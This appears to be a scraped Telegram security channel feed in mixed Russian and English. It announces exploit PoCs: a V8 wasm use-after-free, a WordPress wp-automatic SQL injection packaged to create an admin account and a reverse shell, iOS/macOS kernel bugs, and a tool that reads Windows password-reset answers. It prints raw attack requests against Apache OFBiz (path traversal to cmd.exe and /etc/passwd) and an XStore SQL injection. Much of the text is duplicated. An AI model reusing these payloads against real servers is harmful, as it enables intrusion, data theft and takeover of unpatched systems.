🔥10
Active Directory Hardening Series
*
Part 1 – Disabling NTLMv1
Part 2 – Removing SMBv1
Part 3 – Enforcing LDAP Signing
Part 4 – Enforcing AES for Kerberos
#AD
*
Part 1 – Disabling NTLMv1
Part 2 – Removing SMBv1
Part 3 – Enforcing LDAP Signing
Part 4 – Enforcing AES for Kerberos
#AD
👍18🔥7
Инструмент для чтения контрольных вопросов и ответов.
Это возможно с помощью
*
ReadResetData.c
#win
Это возможно с помощью
SamQueryInformationUser(UserResetInformation).*
ReadResetData.c
#win
👍11🔥6
VPN
*
Разбираем различные методы обнаружения IP-адресов VPN от таких провайдеров, как
*
Читаем ТУТ
*
Большой список VPN exit NODE
#vpn #detect
*
Разбираем различные методы обнаружения IP-адресов VPN от таких провайдеров, как
NordVPN или ExpressVPN. *
Читаем ТУТ
*
Большой список VPN exit NODE
#vpn #detect
👍21🔥9👌1
UAF of wasm memory buffer due to mismatch of cached memory in graph-builder-interface in function ReloadInstanceCacheIntoSsa.
*
POC + exploit + video
*
POC + exploit + video
🔥6
WordPress_Auto_Admin_Account_and_Reverse_Shell_cve_2024_27956.zip
3 KB
cve-2024-27956
*
WordPress Auto Admin Account Creation and Reverse Shell.
*
Дырка в плагине wp-automatic для выполнения SQL-запросов.
#wordpress
*
WordPress Auto Admin Account Creation and Reverse Shell.
*
Дырка в плагине wp-automatic для выполнения SQL-запросов.
#wordpress
🔥16👍7
CVE-2024-27804
уязвимости ядра iOS/macOS, которая приводит к выполнению произвольного кода с привилегиями ядра.
*
POC exploit
#IOS #MAC #kernel
уязвимости ядра iOS/macOS, которая приводит к выполнению произвольного кода с привилегиями ядра.
*
POC exploit
#IOS #MAC #kernel
🔥18👍7😱4
CVE-2024-32113 Apache-OFBiz
*
POC для WIN
POC для *NIX
*
POC для WIN
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
<?xml version="1.0"?>
<methodCall>
<methodName>performCommand</methodName>
<params>
<param>
<value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value>
</param>
</params>
</methodCall>POC для *NIX
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
<?xml version="1.0"?>
<methodCall>
<methodName>example.createBlogPost</methodName>
<params>
<param>
<value><string>../../../../../../etc/passwd</string></value>
</param>
</params>
</methodCall>👍17🔥7
CVE-2024-33551
Уязвимость
Уязвимость позволяет команды SQL в базе данных.
*
POC
#wordpress #sql
Уязвимость
SQL inj, обнаруженная в 8theme XStore, платформе электронной коммерции, созданной на базе WordPress. Уязвимость позволяет команды SQL в базе данных.
*
POC
POST /?s=%27%3B+SELECT+*+FROM+wp_posts%3B+-- HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Upgrade-Insecure-Requests: 1#wordpress #sql
🔥25